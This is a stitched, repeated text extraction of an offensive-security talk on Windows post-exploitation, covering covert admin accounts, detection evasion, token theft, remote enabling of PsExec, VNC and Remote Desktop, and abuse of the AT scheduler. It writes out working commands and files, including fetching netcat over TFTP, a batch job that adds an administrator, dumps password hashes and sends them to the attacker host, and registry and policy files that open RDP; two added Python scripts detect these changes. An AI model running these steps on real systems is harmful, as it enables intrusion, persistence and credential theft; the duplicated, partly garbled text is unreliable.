- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:
    [Unicode]
    Unicode=yes
    [Version]
    signature="$CHICAGO$"
    Revision=1
    [Privilege Rights]
    seremoteinteractivelogonright = hacked_account
    seinteractivelogonright = hacked_account
    sedenyinteractivelogonright =
    sedenyremoteinteractivelogonright =
    sedenynetworklogonright =
  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "TSEnabled"=dword:00000001
    "TSUserEnabled"=dword:00000000
  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /Force
    • net start "terminal services"
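As an added defensive example (not a tool from the talk), a small Python auditor that parses the two file formats used in this procedure, the .reg export and the secedit .ini template, and reports the settings it flips: the RDP deny flag, the Terminal Server enable flag, emptied deny-logon rights and unexpected accounts granted the remote logon right. The sample file contents are constructed from the slides above, and the set of accounts allowed to hold the RDP logon right is an assumption.

```python
"""Audit a .reg export and a secedit .ini template for the Remote Desktop
changes made on slides 53 and 54.  Added example for this transcript, not a
tool from the talk; the sample files are constructed from the slides and the
allowed-account set is an assumption."""
import re

# Constructed from slide 54: turns Terminal Services on via the registry.
ENABLE_TS_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
'''

# Constructed from slide 53: secedit template that rewrites logon rights.
FIX_TS_POLICY_INI = '''[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
'''

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
# Assumption: only Remote Desktop Users (secedit writes SIDs as *S-...) holds the right.
EXPECTED_RDP_ACCOUNTS = {"*s-1-5-32-555"}


def parse_reg(text):
    """Parse a 'Windows Registry Editor Version 5.00' export into
    {key_path: {value_name: value}}: dword -> int, hex -> bytes, quoted -> str."""
    result, current = {}, None
    for raw in text.replace("\\\n", "").splitlines():  # join continued hex lines
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
            continue
        m = re.match(r'^(?:"([^"]+)"|(@))=(.*)$', line)
        if m is None or current is None:
            continue
        name, data = m.group(1) or m.group(2), m.group(3).strip()
        if data.startswith("dword:"):
            value = int(data[len("dword:"):], 16)
        elif data.startswith("hex"):
            value = bytes.fromhex(data.split(":", 1)[1].replace(",", ""))
        else:
            value = data.strip('"')
        result[current][name] = value
    return result


def parse_ini(text):
    """Parse a secedit template into {section: {lowercased name: value}};
    a right that was emptied ('name =') is kept as ''."""
    result, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            result.setdefault(section, {})
        elif "=" in line and section is not None:
            name, value = line.split("=", 1)
            result[section][name.strip().lower()] = value.strip()
    return result


def audit_remote_desktop(reg, ini):
    """Return findings describing how the parsed files change the Remote
    Desktop posture; an empty list means nothing was flagged."""
    findings = []
    ts = reg.get(TS_KEY, {})
    if ts.get("fDenyTSConnections") == 0:
        findings.append("registry: fDenyTSConnections=0 allows RDP connections")
    if ts.get("TSEnabled") == 1:
        findings.append("registry: TSEnabled=1 turns the Terminal Server on")
    rights = ini.get("Privilege Rights", {})
    for deny in ("sedenyremoteinteractivelogonright",
                 "sedenyinteractivelogonright", "sedenynetworklogonright"):
        if rights.get(deny) == "":
            findings.append(f"policy: {deny} cleared (deny list emptied)")
    granted = rights.get("seremoteinteractivelogonright")
    if granted is not None:
        extra = {a.strip().lower() for a in granted.split(",") if a.strip()}
        extra -= EXPECTED_RDP_ACCOUNTS
        if extra:
            findings.append("policy: seremoteinteractivelogonright grants RDP "
                            "logon to " + ", ".join(sorted(extra)))
    return findings
```

Running `audit_remote_desktop(parse_reg(ENABLE_TS_REG), parse_ini(FIX_TS_POLICY_INI))` on the constructed files yields six findings; the same parser reads the vnc.reg file from slide 51 as well.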
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Old-school techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled
    net use \\target\ipc$ password /user:username
    at \\target 12:00 pm command
    Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Add users
  – Mess with the registry and policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT
  – Flow
    • Establish an authenticated session
    • Determine the time on the target
    • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i use GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
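As an added example, not a tool from the talk, detection logic for the scheduler chain described on slides 58 to 61, run over process-creation records: a job that runs as SYSTEM under the service host, pulls a file over TFTP, and is followed shortly by a user being created and placed in Administrators. The record layout, the sample events and the rule that an AT job appears as a child of svchost.exe are assumptions.

```python
"""Detect the AT-job chain from the scheduler slides in process-creation
telemetry: a SYSTEM-context job started by the Schedule service fetches a
file over TFTP, then a local user is created and added to Administrators.
Added example for this transcript, not a tool from the talk.  The event
tuple format and the sample events are constructed; the parent-image rule
assumes the Schedule service runs inside svchost.exe, as on the Windows
versions the slides target."""
import re

# Each rule captures the operands the correlation needs from the command line.
RULES = {
    "tftp_fetch": re.compile(
        r"\btftp(?:\.exe)?\b.*?\s-i\s+(\S+)\s+get\s+(\S+)", re.I),
    "user_add": re.compile(
        r"\bnet(?:1)?(?:\.exe)?\s+user\s+(\S+)\s.*?/add\b", re.I),
    "admin_add": re.compile(
        r"\bnet(?:1)?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b",
        re.I),
}

# Constructed sample events: (time, user, parent image, command line).  The
# first four are what the e.bat flow on slide 61 produces on the target; the
# last two are ordinary activity that must not be flagged.
SAMPLE_EVENTS = [
    ("12:00:01", r"NT AUTHORITY\SYSTEM", r"C:\WINDOWS\system32\svchost.exe",
     "cmd.exe /c tftp -i 10.0.0.5 GET e.bat"),
    ("12:01:02", r"NT AUTHORITY\SYSTEM", r"C:\WINDOWS\system32\svchost.exe",
     "cmd.exe /c e.bat"),
    ("12:01:03", r"NT AUTHORITY\SYSTEM", r"C:\WINDOWS\system32\cmd.exe",
     "net user hacked hacked /add"),
    ("12:01:04", r"NT AUTHORITY\SYSTEM", r"C:\WINDOWS\system32\cmd.exe",
     "net localgroup administrators hacked /add"),
    ("12:05:00", r"CORP\jdoe", r"C:\WINDOWS\explorer.exe",
     "notepad.exe notes.txt"),
    ("12:06:00", r"CORP\admin", r"C:\WINDOWS\system32\cmd.exe",
     "net user svc_backup P@ss /add"),
]


def to_seconds(hhmmss):
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s


def classify(event):
    """Return the rule names an event matches, plus 'scheduled_system_job'
    when it ran as SYSTEM under the service host, which is how an AT job
    appears (slide 59: AT defaults to running as SYSTEM)."""
    _, user, parent, cmd = event
    tags = {name for name, rx in RULES.items() if rx.search(cmd)}
    if user.upper().endswith("\\SYSTEM") and parent.lower().endswith("\\svchost.exe"):
        tags.add("scheduled_system_job")
    return tags


def find_chains(events, window=300):
    """Correlate a scheduled SYSTEM TFTP fetch with an account that is both
    created and put in Administrators within `window` seconds of it.
    Returns one finding per chain; an unrelated 'net user /add' is ignored."""
    findings = []
    tagged = [(to_seconds(e[0]), e, classify(e)) for e in events]
    for t0, e0, tags0 in tagged:
        if not {"tftp_fetch", "scheduled_system_job"} <= tags0:
            continue
        source, fetched = RULES["tftp_fetch"].search(e0[3]).groups()
        created, elevated = set(), set()
        for t, e, tags in tagged:
            if not t0 <= t <= t0 + window:
                continue
            if "user_add" in tags:
                created.add(RULES["user_add"].search(e[3]).group(1).lower())
            if "admin_add" in tags:
                elevated.add(RULES["admin_add"].search(e[3]).group(1).lower())
        accounts = sorted(created & elevated)
        if accounts:
            findings.append({"start": e0[0], "source": source,
                             "file": fetched, "accounts": accounts})
    return findings
```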
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information; bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to
    • All the people from the offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
